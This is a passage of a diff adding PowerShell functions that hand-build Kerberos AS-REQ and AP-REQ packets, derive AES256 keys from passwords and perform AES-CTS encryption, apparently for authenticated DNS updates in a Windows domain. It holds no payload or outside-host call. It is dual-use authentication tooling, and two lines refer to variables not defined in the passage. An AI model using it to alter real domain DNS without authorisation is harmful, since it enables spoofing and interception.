+ [Byte[]]$salt = [System.Text.Encoding]::UTF8.GetBytes($salt)
+ [Byte[]]$password_cleartext = [System.Text.Encoding]::UTF8.GetBytes($password_cleartext)
+ $constant = 0x6B,0x65,0x72,0x62,0x65,0x72,0x6F,0x73,0x7B,0x9B,0x5B,0x2B,0x93,0x13,0x2B,0x93,0x5C,0x9B,0xDC,0xDA,0xD9,0x5C,0x98,0x99,0xC4,0xCA,0xE4,0xDE,0xE6,0xD6,0xCA,0xE4
+ $PBKDF2 = New-Object Security.Cryptography.Rfc2898DeriveBytes($password_cleartext,$salt,4096)
+ Remove-Variable password_cleartext
+ $PBKDF2_key = $PBKDF2.GetBytes(32)
+ $AES = New-Object "System.Security.Cryptography.AesManaged"
+ $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
+ $AES.Padding = [System.Security.Cryptography.PaddingMode]::None
+ $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $AES.KeySize = 256
+ $AES.Key = $PBKDF2_key
+ $AES_encryptor = $AES.CreateEncryptor()
+ $base_key_part_1 = $AES_encryptor.TransformFinalBlock($constant,0,$constant.Length)
+ $base_key_part_2 = $AES_encryptor.TransformFinalBlock($base_key_part_1,0,$base_key_part_1.Length)
+ $base_key = $base_key_part_1[0..15] + $base_key_part_2[0..15]
+
+ return $base_key
+ }
+
+ function New-PacketKerberosASREQ()
+ {
+ param([Byte[]]$username,[Byte[]]$realm,[Byte[]]$namestring,[Byte[]]$nonce,[Byte[]]$pac,[Byte[]]$pac_signature)
+
+ $timestamp = Get-Date
+ $till = $timestamp.AddYears(20)
+ $timestamp = ("{0:u}" -f $timestamp) -replace "-","" -replace " ","" -replace ":",""
+ $till = ("{0:u}" -f $till) -replace "-","" -replace " ","" -replace ":",""
+ [Byte[]]$timestamp = [System.Text.Encoding]::UTF8.GetBytes($timestamp)
+ [Byte[]]$till = [System.Text.Encoding]::UTF8.GetBytes($till)
+
+ if($pac)
+ {
+ $pac_extra_length = 78
+ }
+
+ [Byte[]]$namestring1_length = Get-ASN1LengthArray $namestring.Count
+ [Byte[]]$namestring_length = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + 6)
+ [Byte[]]$namestring_length2 = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + 7)
+ [Byte[]]$sname_length = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + 13)
+ [Byte[]]$sname_length2 = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + 14)
+ [Byte[]]$realm_length = Get-ASN1LengthArray $realm.Count
+ [Byte[]]$realm_length2 = Get-ASN1LengthArray ($realm.Count + $realm_length.Count + 1)
+ [Byte[]]$cname_length = Get-ASN1LengthArray $username.Count
+ [Byte[]]$cname_length2 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + 1)
+ [Byte[]]$cname_length3 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + 2)
+ [Byte[]]$cname_length4 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + 8)
+ [Byte[]]$cname_length5 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + 9)
+ $grouped_length = $address_length.Count + $address_length2.Count + $address_length3.Count + $address_length4.Count + $address_length5.Count + $namestring.Count +
+ $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count + $realm.Count + $realm_length.Count +
+ $realm_length2.Count + $username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count
+ [Byte[]]$reqbody_length = Get-ASN1LengthArrayLong ($grouped_length + 86)
+ [Byte[]]$reqbody_length2 = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + 87)
+ [Byte[]]$message_length = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $pac_extra_length + 114)
+ [Byte[]]$message_length2 = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $message_length.Count + $pac_extra_length + 115)
+ [Byte[]]$asreq_length = [System.BitConverter]::GetBytes($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $message_length.Count + $message_length2.Count +
+ $pac_extra_length + 116)[3..0]
+
+ $packet_KerberosASREQ = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_KerberosASREQ.Add("Length",$asreq_length)
+ $packet_KerberosASREQ.Add("Message_Encoding",[Byte[]](0x6a) + $message_length2 + [Byte[]](0x30) + $message_length)
+ $packet_KerberosASREQ.Add("Message_PVNO_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_PVNO",[Byte[]](0x05))
+ $packet_KerberosASREQ.Add("Message_MSGType_Encoding",[Byte[]](0xa2,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_MSGType",[Byte[]](0x0a))
+
+ if($pac)
+ {
+ $packet_KerberosASREQ.Add("Message_PAData_Encoding",[Byte[]](0xa3,0x5c,0x30,0x5a,0x30,0x4c,0xa1,0x03,0x02,0x01,0x02))
+ $packet_KerberosASREQ.Add("Message_PAData0_Type_Encoding",[Byte[]](0xa2,0x45,0x04,0x43,0x30,0x41,0xa0,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_PAData0_Type",[Byte[]](0x12))
+ $packet_KerberosASREQ.Add("Message_PAData0_Value_Encoding",[Byte[]](0xa2,0x3a,0x04,0x38))
+ $packet_KerberosASREQ.Add("Message_PAData0_Value",$pac)
+ $packet_KerberosASREQ.Add("Message_PAData0_Signature",$pac_signature)
+ $packet_KerberosASREQ.Add("Message_PAData1_Type_Encoding",[Byte[]](0x30,0x0a,0xa1,0x04,0x02,0x02))
+ }
+ else
+ {
+ $packet_KerberosASREQ.Add("Message_PAData_Encoding",[Byte[]](0xa3,0x0e,0x30,0x0c,0x30,0x0a))
+ $packet_KerberosASREQ.Add("Message_PAData1_Type_Encoding",[Byte[]](0xa1,0x04,0x02,0x02))
+ }
+
+ $packet_KerberosASREQ.Add("Message_PAData1_Type",[Byte[]](0x00,0x95))
+ $packet_KerberosASREQ.Add("Message_PAData1_Value_Encoding",[Byte[]](0xa2,0x02,0x04))
+ $packet_KerberosASREQ.Add("Message_PAData1_Value",[Byte[]](0x00))
+ $packet_KerberosASREQ.Add("Message_REQBody_Encoding",[Byte[]](0xa4) + $reqbody_length2 + [Byte[]](0x30) + $reqbody_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions_Encoding",[Byte[]](0xa0,0x07,0x03,0x05))
+ $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions_Padding",[Byte[]](0x00))
+ $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions",[Byte[]](0x50,0x00,0x00,0x00))
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_Encoding",[Byte[]](0xa1) + $cname_length5 + [Byte[]](0x30) + $cname_length4)
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_NameType",[Byte[]](0x01))
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_NameString_Encoding",[Byte[]](0xa1) + $cname_length3 + [Byte[]](0x30) + $cname_length2 + [Byte[]](0x1b) + $cname_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_NameString",$username)
+ $packet_KerberosASREQ.Add("Message_REQBody_Realm_Encoding",[Byte[]](0xa2) + $realm_length2 + [Byte[]](0x1b) + $realm_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_Realm",$realm)
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_Encoding",[Byte[]](0xa3) + $sname_length2 + [Byte[]](0x30) + $sname_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameType",[Byte[]](0x01))
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString_Encoding",[Byte[]](0xa1) + $namestring_length2 + [Byte[]](0x30) + $namestring_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString0_Encoding",[Byte[]](0x1b,0x03))
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString0",[Byte[]](0x44,0x4e,0x53))
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString1_Encoding",[Byte[]](0x1b) + $namestring1_length) #50
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString1",$namestring)
+ $packet_KerberosASREQ.Add("Message_REQBody_Till_Encoding",[Byte[]](0xa5,0x11,0x18,0x0f))
+ $packet_KerberosASREQ.Add("Message_REQBody_Till",$till)
+ $packet_KerberosASREQ.Add("Message_REQBody_Nonce_Encoding",[Byte[]](0xa7,0x06,0x02,0x04))
+ $packet_KerberosASREQ.Add("Message_REQBody_Nonce",$nonce)
+ $packet_KerberosASREQ.Add("Message_REQBody_EType_Encoding",[Byte[]](0xa8,0x15,0x30,0x13))
+ $packet_KerberosASREQ.Add("Message_REQBody_EType",[Byte[]](0x02,0x01,0x12,0x02,0x01,0x11,0x02,0x01,0x17,0x02,0x01,0x18,0x02,0x02,0xff,0x79,0x02,0x01,0x03))
+
+ return $packet_KerberosASREQ
+ }
+
+ function New-PacketKerberosAPREQ()
+ {
+ param([Byte[]]$realm,[Byte[]]$spn,[Byte[]]$kvno,[Byte[]]$ticket,[Byte[]]$authenticator,[Byte[]]$authenticator_signature)
+
+ $authenticator += $authenticator_signature
+ $parameter_length = $realm.Count + $spn.Count + $ticket.Count + $authenticator.Count
+ [Byte[]]$authenticator_length = Get-ASN1LengthArrayLong $authenticator.Count
+ [Byte[]]$authenticator_length2 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + 1)
+ [Byte[]]$authenticator_length3 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + $authenticator_length2.Count + 7)
+ [Byte[]]$authenticator_length4 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + $authenticator_length2.Count + $authenticator_length3.Count + 8)
+ [Byte[]]$ticket_length = Get-ASN1LengthArrayLong $ticket.Count
+ [Byte[]]$ticket_length2 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + 1)
+ [Byte[]]$ticket_length3 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + 12)
+ [Byte[]]$ticket_length4 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + 13)
+ [Byte[]]$namestring1_length = Get-ASN1LengthArray $spn.Count
+ [Byte[]]$namestring_length = Get-ASN1LengthArray ($spn.Count + $namestring_length.Count + 4)
+ [Byte[]]$namestring_length2 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + 5)
+ [Byte[]]$sname_length = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + 4)
+ [Byte[]]$sname_length2 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + 5)
+ [Byte[]]$sname_length3 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count + 11)
+ [Byte[]]$sname_length4 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + 12)
+ [Byte[]]$realm_length = Get-ASN1LengthArray $realm.Count
+ [Byte[]]$realm_length2 = Get-ASN1LengthArray ($realm.Count + $realm_length.Count + 1)
+ [Byte[]]$ticket_length5 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
+ $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + 34)
+ [Byte[]]$ticket_length6 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
+ $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + 35)
+ [Byte[]]$ticket_length7 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
+ $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + 36)
+ [Byte[]]$apreq_length = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
+ $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count + 73)
+ [Byte[]]$apreq_length2 = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
+ $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count +
+ $apreq_length.Count + 74)
+ [Byte[]]$length = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
+ $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count +
+ $apreq_length.Count + $apreq_length2.Count + 88)
+
+ $packet_KerberosAPREQ = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_KerberosAPREQ.Add("Length",([Byte[]](0x60) + $length))
+ $packet_KerberosAPREQ.Add("MechToken_ThisMech",[Byte[]](0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x12,0x01,0x02,0x02))
+ $packet_KerberosAPREQ.Add("MechToken_TokenID",[Byte[]](0x01,0x00))
+ $packet_KerberosAPREQ.Add("APReq_Encoding",[Byte[]](0x6e) + $apreq_length2 + [Byte[]](0x30) + $apreq_length)
+ $packet_KerberosAPREQ.Add("PVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("PVNO",[Byte[]]0x05)
+ $packet_KerberosAPREQ.Add("MSGType_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("MSGType",[Byte[]](0x0e))
+ $packet_KerberosAPREQ.Add("Padding_Encoding",[Byte[]](0xa2,0x07,0x03,0x05))
+ $packet_KerberosAPREQ.Add("Padding",[Byte[]](0x00))
+ $packet_KerberosAPREQ.Add("APOptions",[Byte[]](0x20,0x00,0x00,0x00))
+ $packet_KerberosAPREQ.Add("Ticket_Encoding",[Byte[]](0xa3) + $ticket_length7 + [Byte[]](0x61) + $ticket_length6 + [Byte[]](0x30) + $ticket_length5)
+ $packet_KerberosAPREQ.Add("Ticket_TKTVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Ticket_TKTVNO",[Byte[]](0x05))
+ $packet_KerberosAPREQ.Add("Ticket_Realm_Encoding",[Byte[]](0xa1) + $realm_length2 + [Byte[]](0x1b) + $realm_length)
+ $packet_KerberosAPREQ.Add("Ticket_Realm",$realm)
+ $packet_KerberosAPREQ.Add("Ticket_SName_Encoding",[Byte[]](0xa2) + $sname_length4 + [Byte[]](0x30) + $sname_length3)
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameType",[Byte[]](0x01))
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString_Encoding",[Byte[]](0xa1) + $sname_length2 + [Byte[]](0x30) + $sname_length)
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString0_Encoding",[Byte[]](0x1b,0x03))
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString0",[Byte[]](0x44,0x4e,0x53))
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString1_Encoding",[Byte[]](0x1b) + $namestring1_length)
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString1",$spn)
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_Encoding",[Byte[]](0xa3) + $ticket_length4 + [Byte[]](0x30) + $ticket_length3)
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_EType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_EType",[Byte[]](0x12))
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_KVNO_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_KVNO",$kvno)
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_Cipher_Encoding",[Byte[]](0xa2) + $ticket_length2 + [Byte[]](0x04) + $ticket_length)
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_Cipher",$ticket)
+ $packet_KerberosAPREQ.Add("Authenticator_Encoding",[Byte[]](0xa4) + $authenticator_length4 + [Byte[]](0x30) + $authenticator_length3)
+ $packet_KerberosAPREQ.Add("Authenticator_EType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Authenticator_EType",[Byte[]](0x12))
+ $packet_KerberosAPREQ.Add("Authenticator_Cipher_Encoding",[Byte[]](0xa2) + $authenticator_length2 + [Byte[]](0x04) + $authenticator_length)
+ $packet_KerberosAPREQ.Add("Authenticator_Cipher",$authenticator)
+
+ return $packet_KerberosAPREQ
+ }
+
+ function Unprotect-KerberosASREP
+ {
+ param([Byte[]]$ke_key,[Byte[]]$encrypted_data)
+
+ $final_block_length = [Math]::Truncate($encrypted_data.Count % 16)
+ [Byte[]]$final_block = $encrypted_data[($encrypted_data.Count - $final_block_length)..$encrypted_data.Count]
+ [Byte[]]$penultimate_block = $encrypted_data[($encrypted_data.Count - $final_block_length - 16)..($encrypted_data.Count - $final_block_length - 1)]
+ $AES = New-Object "System.Security.Cryptography.AesManaged"
+ $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
+ $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
+ $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $AES.KeySize = 256
+ $AES.Key = $ke_key
+ $AES_decryptor = $AES.CreateDecryptor()
+ $penultimate_block_cleartext = $AES_decryptor.TransformFinalBlock($penultimate_block,0,$penultimate_block.Length)
+ [Byte[]]$final_block_padding = $penultimate_block_cleartext[$final_block_length..$penultimate_block_cleartext.Count]
+ $final_block += $final_block_padding
+ [Byte[]]$cts_encrypted_data = $encrypted_data[0..($encrypted_data.Count - $final_block_length - 17)] + $final_block + $penultimate_block
+ [Byte[]]$cleartext = $AES_decryptor.TransformFinalBlock($cts_encrypted_data,0,$cts_encrypted_data.Length)
+
+ return $cleartext
+ }
+
+ function New-KerberosPACTimestamp
+ {
+ param([Byte[]]$ke_key)
+
+ [Byte[]]$timestamp = Get-KerberosTimestampUTC
+ [String]$confounder = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ [Byte[]]$confounder = $confounder.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ [Byte[]]$PAC_Timestamp = $confounder +
+ 0x30,0x1a,0xa0,0x11,0x18,0x0f +
+ $timestamp +
+ 0xa1,0x05,0x02,0x03,0x01,0x70,0x16
+
+ return $PAC_Timestamp
+ }
+
+ function New-KerberosAuthenticator
+ {
+ param([Byte[]]$realm,[Byte[]]$username,[Byte[]]$subkey,[Byte[]]$sequence_number)
+
+ $parameter_length = $realm.Count + $username.Count + $subkey.Count
+ [Byte[]]$subkey_length = Get-ASN1LengthArray $subkey.Count
+ [Byte[]]$subkey_length2 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + 1)
+ [Byte[]]$subkey_length3 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + $subkey_length2.Count + 7)
+ [Byte[]]$subkey_length4 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + $subkey_length2.Count + $subkey_length3.Count + 8)
+ [Byte[]]$cname_length = Get-ASN1LengthArray $username.Count
+ [Byte[]]$cname_length2 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + 1)
+ [Byte[]]$cname_length3 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + 2)
+ [Byte[]]$cname_length4 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + 8)
+ [Byte[]]$cname_length5 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + 9)
+ [Byte[]]$crealm_length = Get-ASN1LengthArray $realm.Count
+ [Byte[]]$crealm_length2 = Get-ASN1LengthArray ($realm.Count + $crealm_length.Count + 1)
+ [Byte[]]$authenticator_length = Get-ASN1LengthArrayLong ($parameter_length + 99 + $crealm_length.Count + $crealm_length2.Count +
+ $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count + $subkey_length.Count +
+ $subkey_length2.Count + $subkey_length3.Count + $subkey_length4.Count)
+ [Byte[]]$authenticator_length2 = Get-ASN1LengthArrayLong ($parameter_length + 100 + $crealm_length.Count + $crealm_length2.Count +
+ $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count + $subkey_length.Count +
+ $subkey_length2.Count + $subkey_length3.Count + $subkey_length4.Count + $authenticator_length.Count)
+
+ $packet_KerberosAuthenticator = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_KerberosAuthenticator.Add("Encoding",[Byte[]](0x62) + $authenticator_length2 + [Byte[]](0x30) + $authenticator_length)
+ $packet_KerberosAuthenticator.Add("AuthenticatorVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAuthenticator.Add("AuthenticatorVNO",[Byte[]](0x05))
+ $packet_KerberosAuthenticator.Add("CRealm_Encoding",[Byte[]](0xa1) + $crealm_length2 + [Byte[]](0x1b) + $crealm_length)
+ $packet_KerberosAuthenticator.Add("CRealm",$realm)
+ $packet_KerberosAuthenticator.Add("CName_Encoding",[Byte[]](0xa2) + $cname_length5 + [Byte[]](0x30) + $cname_length4)
+ $packet_KerberosAuthenticator.Add("CName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAuthenticator.Add("CName_NameType",[Byte[]](0x01))
+ $packet_KerberosAuthenticator.Add("CName_CNameString_Encoding",[Byte[]](0xa1) + $cname_length3 + [Byte[]](0x30) +
+ $cname_length2 + [Byte[]](0x1b) + $cname_length)
+ $packet_KerberosAuthenticator.Add("CName_CNameString",$username)
+ $packet_KerberosAuthenticator.Add("CKSum_Encoding",[Byte[]](0xa3,0x25,0x30,0x23,0xa0,0x05,0x02,0x03))
+ $packet_KerberosAuthenticator.Add("CKSum_CKSumType",[Byte[]](0x00,0x80,0x03))
+ $packet_KerberosAuthenticator.Add("CKSum_Length_Encoding",[Byte[]](0xa1,0x1a,0x04,0x18))
+ $packet_KerberosAuthenticator.Add("CKSum_Length",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_KerberosAuthenticator.Add("CKSum_Bnd",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_KerberosAuthenticator.Add("CKSum_Flags",[Byte[]](0x36,0x01,0x00,0x00))
+ $packet_KerberosAuthenticator.Add("CKSum_CUSec_Encoding",[Byte[]](0xa4,0x05,0x02,0x03))
+ $packet_KerberosAuthenticator.Add("CKSum_CUSec",(Get-KerberosMicrosecond))
+ $packet_KerberosAuthenticator.Add("CKSum_CTime_Encoding",[Byte[]](0xa5,0x11,0x18,0x0f))
+ $packet_KerberosAuthenticator.Add("CKSum_CTime",(Get-KerberosTimestampUTC))
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_Encoding",[Byte[]](0xa6) + $subkey_length4 + [Byte[]](0x30) + $subkey_length3)
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyType",[Byte[]](0x12))
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyValue_Encoding",[Byte[]](0xa1) + $subkey_length2 + [Byte[]](0x04) + $subkey_length)
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyValue",$subkey)
+ $packet_KerberosAuthenticator.Add("CKSum_SEQNumber_Encoding",[Byte[]](0xa7,0x06,0x02,0x04))
+ $packet_KerberosAuthenticator.Add("CKSum_SEQNumber",$sequence_number)
+
+ return $packet_KerberosAuthenticator
+ }
+
+ function Get-KerberosTimestampUTC
+ {
+ [DateTime]$timestamp = (Get-Date).ToUniversalTime()
+ [String]$timestamp = ("{0:u}" -f $timestamp) -replace "-","" -replace " ","" -replace ":",""
+ [Byte[]]$timestamp = [System.Text.Encoding]::UTF8.GetBytes($timestamp)
+
+ return $timestamp
+ }
+
+ function Get-KerberosMicrosecond
+ {
+ [Int]$microseconds = Get-Date -Format ffffff
+ [Byte[]]$microseconds = [System.Bitconverter]::GetBytes($microseconds)[0..2]
+
+ return $microseconds
+ }
+
+ function Protect-KerberosAES256CTS
+ {
+ param([Byte[]]$ke_key,[Byte[]]$data)
+
+ $AES = New-Object "System.Security.Cryptography.AesManaged"
+ $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
+ $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
+ $IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $AES.IV = $IV
+ $AES.KeySize = 256
+ $AES.Key = $ke_key
+ $AES_encryptor = $AES.CreateEncryptor()
+ $data_encrypted = $AES_encryptor.TransformFinalBlock($data,0,$data.Length)
+ $block_count = [Math]::Ceiling($data_encrypted.Count / 16)
+
+ if($block_count -gt 2)
+ {
+ $data_encrypted = $data_encrypted[0..($data_encrypted.Count - 33)] + $data_encrypted[($data_encrypted.Count - 16)..$data_encrypted.Count] +
+ $data_encrypted[($data_encrypted.Count - 32)..($data_encrypted.Count - 17)]
+ }
+ elseif($blocks -eq 2)
+ {
+ $data_encrypted = $data_encrypted[16..31] + $data_encrypted[0..15]
+ }
+
+ $final_block_length = [Math]::Truncate($data.Count % 16)
+
+ if($final_block_length -ne 0)
+ {
+ $remove_count = 16 - $final_block_length
+ $data_encrypted = $data_encrypted[0..($data_encrypted.Count - $remove_count - 1)]
+ }
+
+ return $data_encrypted
+ }
+ # TCPClient Kerberos end
+
+ function Get-KerberosHMACSHA1
+ {
+ param([Byte[]]$key,[Byte[]]$data)
+
+ $HMAC_SHA1 = New-Object System.Security.Cryptography.HMACSHA1
+ $HMAC_SHA1.key = $key
+ $hash = $HMAC_SHA1.ComputeHash($data)
+ $hash = $hash[0..11]
+
+ return $hash
+ }
+
+ function Get-ASN1LengthArray
+ {
+ param([Int]$length)
+
+ [Byte[]]$asn1 = [System.BitConverter]::GetBytes($length)
+
+ if($asn1[1] -eq 0)
+ {
+ $asn1 = $asn1[0]
+ }
+ else
+ {
+ $asn1 = $asn1[1,0]
+ }
+
+ return $asn1
+ }
+
+ function Get-ASN1LengthArrayLong
+ {
+ param([Int]$length)
+
+ [Byte[]]$asn1 = [System.BitConverter]::GetBytes($length)
+
+ if($asn1[1] -eq 0)
+ {
+ $asn1 = $asn1[0]
+ $asn1 = [Byte[]]0x81 + $asn1
+ }
+ else
+ {
+ $asn1 = $asn1[1,0]
+ $asn1 = [Byte[]]0x82 + $asn1
+ }
+
+ return $asn1
+ }
+
+ function New-RandomByteArray
+ {
+ param([Int]$length,[Int]$minimum=1,[Int]$maximum=255)
+
+ [String]$random = [String](1..$length | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum $minimum -Maximum $maximum)})
+ [Byte[]]$random = $random.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ return $random
+ }
+
+ function New-DNSNameArray
+ {
+ param([String]$name)
+
+ $character_array = $name.ToCharArray()
+ [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
+
+ if($index_array.Count -gt 0)
+ {
+
